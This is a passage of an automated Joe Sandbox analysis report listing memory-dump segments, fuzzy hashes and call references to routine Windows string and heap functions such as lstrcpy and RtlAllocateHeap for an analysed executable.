                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 560a07566f14d67a5e6f7090b7733fb6f8f0a32701400585c50d423044039cef
                                • Instruction ID: 3b2fd74e67831711889cc327e7659c9e1ae7c017bec6e47a3151818b349ef6bd
                                • Opcode Fuzzy Hash: 560a07566f14d67a5e6f7090b7733fb6f8f0a32701400585c50d423044039cef
                                • Instruction Fuzzy Hash: 30123D70A012018FDB28CF29D554B25B7E1BF4436EB19D4AEE809EB3A6D772DD46CB40
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E57C94
                                • std::_Xinvalid_argument.LIBCPMT ref: 00E57CAF
                                  • Part of subcall function 00E57D40: std::_Xinvalid_argument.LIBCPMT ref: 00E57D58
                                  • Part of subcall function 00E57D40: std::_Xinvalid_argument.LIBCPMT ref: 00E57D76
                                  • Part of subcall function 00E57D40: std::_Xinvalid_argument.LIBCPMT ref: 00E57D91
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: string too long
                                • API String ID: 909987262-2556327735
                                • Opcode ID: 13f685c43f9537fc9f9f1523f0ff38bb24df47fc894ba8e11e1b7e2e0e5a6afb
                                • Instruction ID: 7293bfead2cd3b21d96a1dbe1947f65d54a3a0eaf31133e4d38b1439e87635d5
                                • Opcode Fuzzy Hash: 13f685c43f9537fc9f9f1523f0ff38bb24df47fc894ba8e11e1b7e2e0e5a6afb
                                • Instruction Fuzzy Hash: 033139723082004BD730DD6CF88096AF7E9EF95756B205E2AF9C1AB641C7719C9583A4
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,?), ref: 00E46F74
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E46F7B
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                 • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcess
                                • String ID: @
                                • API String ID: 1357844191-2766056989
                                • Opcode ID: cca80e263a845fe4e39ca3d1f0060b1dbda44c316ecd8db7d6c85fedcee0bda6
                                • Instruction ID: cae2e610e9ac0e318de8711cb07d37acedb3904e31fd0f4f44e9378ab4a57742
                                • Opcode Fuzzy Hash: cca80e263a845fe4e39ca3d1f0060b1dbda44c316ecd8db7d6c85fedcee0bda6
                                • Instruction Fuzzy Hash: 85218EB06006019BEB208F24EC85BBA73E8FB41708F445968F986DB685E7B9E949C751
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E6244C
                                • lstrlen.KERNEL32(00000000), ref: 00E624E9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E62570
                                • lstrlen.KERNEL32(00000000), ref: 00E62577
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 78db9240e5f4ddf73cbc1efe6de4b93e7c9d1d3bfff3970aa5bb8123d1105e20
                                • Instruction ID: c01efdbd07094d8634b011b6e0e8531fa4202c2188a276675f162f2cf799b4a7
                                • Opcode Fuzzy Hash: 78db9240e5f4ddf73cbc1efe6de4b93e7c9d1d3bfff3970aa5bb8123d1105e20
                                • Instruction Fuzzy Hash: 8381F3B0E402059BDB24DF94EC44BAEB7B5EF84344F18906DE609B7381EB359D45CB91
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 00E615A1
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E615D9
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E61611
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E61649
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 64e1b2f67a0090c5415d7ce451aade54baf284b5323cad0ad5d53e6b4bc9df32
                                • Instruction ID: 02fa22d88a26b98c9f6816d4850ead1587fe528ae8bf4d648bbeabae14c839f1
                                • Opcode Fuzzy Hash: 64e1b2f67a0090c5415d7ce451aade54baf284b5323cad0ad5d53e6b4bc9df32
                                • Instruction Fuzzy Hash: B22119B4601B029FD735DF2AE458A17B7F4AF88744B48691CA887E7B40DB34F801CBA0
                                APIs
                                  • Part of subcall function 00E41610: lstrcpy.KERNEL32(00000000), ref: 00E4162D
                                  • Part of subcall function 00E41610: lstrcpy.KERNEL32(00000000,?), ref: 00E4164F
                                  • Part of subcall function 00E41610: lstrcpy.KERNEL32(00000000,?), ref: 00E41671
                                  • Part of subcall function 00E41610: lstrcpy.KERNEL32(00000000,?), ref: 00E41693
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E41557
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E41579
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4159B
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E415FF
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: 5b4ae74d690a27c3fa93cf9c58b4e6af19f4135d9c9550d7ef6ae68120fa4cad
                                • Instruction ID: dfe80dc79fffb8476a386a6e1eb9a9b31cf082f96e4a4f558d4f8385804b5906
                                • Opcode Fuzzy Hash: 5b4ae74d690a27c3fa93cf9c58b4e6af19f4135d9c9550d7ef6ae68120fa4cad
                                • Instruction Fuzzy Hash: 7A31E774A01B02AFCB24DF3AE588952BBF5FF88304740592DA996D3B10DB34F851CB80
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 00E4162D
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E4164F
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E41671
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E41693
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID:
                                • API String ID: 3722407311-0
                                • Opcode ID: fa0bbcd1c7abdca79cdc22a34c7a177f9a06e4f070d516f17f9d062b19d104ab
                                • Instruction ID: 42a4efc47c98ae6ef91e7d564c2c1dadd2412220c5ab79cf49ffc9720eb9b1a7
                                • Opcode Fuzzy Hash: fa0bbcd1c7abdca79cdc22a34c7a177f9a06e4f070d516f17f9d062b19d104ab
                                • Instruction Fuzzy Hash: 09115274A11B02ABDB249F39F50C927B7F8FF48309749556DA496E3B40EB34E851CB90